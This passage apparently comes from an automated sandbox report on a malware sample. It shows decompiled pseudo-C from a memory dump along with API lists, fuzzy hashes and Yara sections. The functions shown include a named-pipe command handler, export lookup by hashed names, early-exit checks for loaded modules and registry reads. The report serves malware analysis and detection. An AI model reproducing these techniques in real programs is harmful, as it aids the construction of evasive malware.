									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0xe9f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1); // executed
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe); // executed
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0xe9f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0xe9f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x00084d6d
0x00084d73
0x00084d79
0x00084d7e
0x00084d8c
0x00084d8f
0x00084dee
0x00084df7
0x00084e00
0x00084e03
0x00084e0a
0x00084e0f
0x00084e14
0x00084e1b
0x00084e25
0x00084e2c
0x00084e32
0x00084e37
0x00084e3c
0x00084e43
0x00084e49
0x00084e4b
0x00084e4c
0x00084e50
0x00084e5b
0x00084e60
0x00084e69
0x00084e6e
0x00084e76
0x00084e7d
0x00084e7e
0x00084e80
0x00084e9c
0x00084e9f
0x00084e9f
0x00084ea8
0x00084ead
0x00084ebd
0x00084ec5
0x00084eca
0x00084ed0
0x00084ed3
0x00084ed9
0x00084ef8
0x00084efe
0x00084eff
0x00084f00
0x00084f01
0x00084f02
0x00084f03
0x00084f0d
0x00084f11
0x00084f16
0x00084f19
0x00084f1b
0x00084f2d
0x00084f2d
0x00084f2f
0x00084f3b
0x00084f40
0x00084f46
0x00084f4f
0x00084f52
0x00084f54
0x00084f5f
0x00084f64
0x00084f69
0x00084f6e
0x00084f6e
0x00084f71
0x00084f78
0x00000000
0x00084f7e
0x00084f7e
0x00084f83
0x00084f87
0x00084f89
0x00084f8c
0x00084f8e
0x00084f94
0x00084f94
0x00084f8e
0x00084f96
0x00084f9b
0x00084fa1
0x00084fa3
0x00000000
0x00084fa9
0x00084fa9
0x00084fad
0x00085082
0x00085088
0x0008508e
0x00085099
0x0008509a
0x0008509b
0x0008509c
0x000850a2
0x000850a7
0x000850ad
0x000850b5
0x000850bb
0x000850be
0x000850cd
0x000850d4
0x000850d7
0x000850e4
0x000850e8
0x000850f5
0x000850fa
0x000850fd
0x000850ff
0x00085110
0x00085112
0x00085116
0x00085117
0x00085119
0x00085124
0x00085129
0x00085136
0x0008513a
0x0008513b
0x0008513d
0x00085145
0x00085146
0x0008514b
0x00085163
0x00085168
0x0008516b
0x0008516f
0x00085171
0x00085184
0x0008518e
0x00085192
0x0008519a
0x0008519b
0x000851a3
0x000851a4
0x000851a9
0x000851b5
0x000851bf
0x000851d1
0x000851dd
0x000851e2
0x000851e2
0x000851ec
0x000851f2
0x000851f2
0x00085119
0x000850ff
0x00000000
0x00085088
0x00084fb3
0x00084fb6
0x00000000
0x00000000
0x00084fbc
0x00084fc7
0x00084fc8
0x00084fc9
0x00084fca
0x00084fd0
0x00084fd5
0x00084fe9
0x00084fee
0x00084ff2
0x00084ffd
0x00085006
0x00085008
0x0008500c
0x0008500d
0x0008500f
0x0008501a
0x00085020
0x00085032
0x00085035
0x00085038
0x00085045
0x0008504d
0x00085057
0x00085069
0x00085075
0x0008507a
0x00000000
0x0008500f
0x00084fa3
0x00084edb
0x00084edb
0x00084ee1
0x00084ee3
0x00000000
0x00000000
0x00084ee5
0x00084ee9
0x000851f3
0x000851f8
0x000851fe
0x00085200
0x00085201
0x00085205
0x00085215
0x0008521a
0x0008521e
0x00085220
0x00085224
0x00085229
0x0008522b
0x0008522d
0x00085233
0x00085233
0x00085240
0x00085246
0x0008524c
0x00085251
0x0008526f
0x00085271
0x0008527d
0x0008527d
0x00085283
0x00085285
0x0008528b
0x0008529d
0x000852a3
0x000852af
0x000852b7
0x000852b7
0x000852b7
0x000852b9
0x000852bf
0x000852bf
0x00084eef
0x00084ef2
0x00000000
0x00000000
0x00000000
0x00084ef2
0x00084ed9
0x00084e1d
0x00084e1d
0x00000000
0x00084e1d
0x00084d9b
0x00084da2
0x00084dab
0x00084dad
0x00084db3
0x00084dc4
0x00084dcd
0x00084dcd
0x00084dd9
0x00084de2
0x00084de7
0x00084dec
0x00000000
0x00000000
0x00084dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 4a50328df8d3e64cefb64bf281c7b55ad0a95e4f9f5383233e43d29d8882ca49
Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
Opcode Fuzzy Hash: 4a50328df8d3e64cefb64bf281c7b55ad0a95e4f9f5383233e43d29d8882ca49
Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0xe9f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0xd50020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0xd50020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x000832ac
0x000832ae
0x000832b0
0x000832b4
0x000832b7
0x000832c3
0x000832ce
0x00000000
0x00000000
0x000832e1
0x000832e5
0x000832e6
0x000832eb
0x000832f0
0x000832f6
0x00083304
0x000834a8
0x00083314
0x00083314
0x0008331d
0x00083320
0x000833c8
0x000833ca
0x000833d1
0x000833d7
0x000833dd
0x00083456
0x00083461
0x00083466
0x00083469
0x000833df
0x000833e2
0x000833ee
0x000833f0
0x000833f6
0x00083471
0x000833f8
0x000833fd
0x000833ff
0x00083402
0x00083404
0x00083412
0x00083417
0x0008341a
0x0008341b
0x00083420
0x00083423
0x00083427
0x00083427
0x0008342c
0x00083439
0x0008343e
0x00083441
0x0008344d
0x0008344d
0x00083473
0x00083473
0x000833dd
0x00083476
0x0008348a
0x0008348f
0x0008349a
0x0008349b
0x00000000
0x00083326
0x00083326
0x00083329
0x00083397
0x00083398
0x0008339b
0x0008339c
0x000833a3
0x000833ae
0x000833b0
0x0008332b
0x0008332c
0x0008332f
0x0008337f
0x00000000
0x00083331
0x00083331
0x00083334
0x00083369
0x00000000
0x00083336
0x00083336
0x00083339
0x00083353
0x00083358
0x0008335b
0x00083386
0x00083387
0x00083388
0x0008335d
0x0008335d
0x00083360
0x00083361
0x00083361
0x0008338a
0x0008338b
0x0008333b
0x0008333e
0x00083348
0x0008336e
0x0008336e
0x00083373
0x00083374
0x0008349d
0x0008349d
0x0008349e
0x000834a3
0x000834a3
0x0008333e
0x00083339
0x00083334
0x0008332f
0x00083329
0x00083320
0x000834b4
0x000834bc
0x00000000
0x00000000
0x00000000
0x000834bc
0x000834c8

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
GetLastError.KERNEL32 ref: 000832D0

Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001E4), ref: 0008C35F

DisconnectNamedPipe.KERNEL32 ref: 000834B4

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
Opcode Fuzzy Hash: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0xe9fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0xe9fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0xe9fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}

0x0008b012
0x0008b023
0x0008b035
0x0008b037
0x0008b045
0x0008b054
0x0008b05f
0x0008b067
0x0008b074
0x0008b07a
0x0008b07e
0x0008b080
0x0008b094
0x0008b09d
0x0008b0a8
0x0008b0a8
0x0008b094
0x0008b0ab
0x0008b0b2
0x0008b0d0
0x0008b0dd

APIs

memset.MSVCRT ref: 0008B037
memset.MSVCRT ref: 0008B045
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F

Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0xe9fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x0008bf55
0x0008bf58
0x0008bf5b
0x0008bf66
0x0008bf8a
0x0008bfc7
0x0008bfca
0x0008bfcc
0x0008bfd4
0x0008bfd4
0x0008bfd7
0x0008bfd9
0x00000000
0x0008bfd9
0x0008bf94
0x0008bf96
0x0008bf9c
0x00000000
0x00000000
0x0008bfb8
0x0008bfe5
0x0008bfe8
0x00000000
0x0008bfe8
0x0008bfc0
0x00000000
0x0008bfc6
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 8ffa3b54626bbe71b199a840e3cf3d821d05c175afa1efb499af0953314715c4
Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
Opcode Fuzzy Hash: 8ffa3b54626bbe71b199a840e3cf3d821d05c175afa1efb499af0953314715c4
Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x0008beae
0x0008beb8
0x0008bebb
0x0008bec3
0x00000000
0x0008bec5
0x0008becc
0x0008bee6
0x0008bef2
0x0008bef7
0x0008bf15
0x0008bf1a
0x0008bf1f
0x0008bf1f
0x0008bf1a
0x0008bef7
0x0008bf24
0x0008bf2e
0x0008bf2e
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,00E9FC18,00000000,?,00000002), ref: 0008BEBE
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
Opcode Fuzzy Hash: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x0008dfb6
0x0008dfb8
0x0008dfbb
0x0008dfbe
0x0008dfc4
0x0008e021
0x00000000
0x0008e021
0x0008dfc6
0x0008dfd1
0x0008dfd4
0x0008dfd9
0x0008dfde
0x0008dfe1
0x0008dfe3
0x0008dfe6
0x0008dfe9
0x0008dfee
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dff0
0x0008dff0
0x0008e002
0x0008e00f
0x0008e013
0x00000000
0x00000000
0x0008e015
0x0008e018
0x0008e019
0x0008e01f
0x00000000
0x00000000
0x00000000
0x0008e01f
0x0008e036
0x0008e03b
0x0008e03f
0x00000000
0x0008e04b
0x0008e04b
0x0008e04d
0x0008e04d
0x0008e053
0x00000000
0x00000000
0x0008e059
0x0008e05d
0x0008e061
0x00000000
0x00000000
0x00000000
0x0008e061
0x0008e067
0x0008e06f
0x0008e074
0x0008e077
0x0008e077
0x0008e079
0x0008e07d
0x0008e085
0x00000000
0x00000000
0x0008e089
0x0008e091
0x00000000
0x00000000
0x00000000
0x0008e091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089

Strings

.dll, xrefs: 0008E079, 0008E07C

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
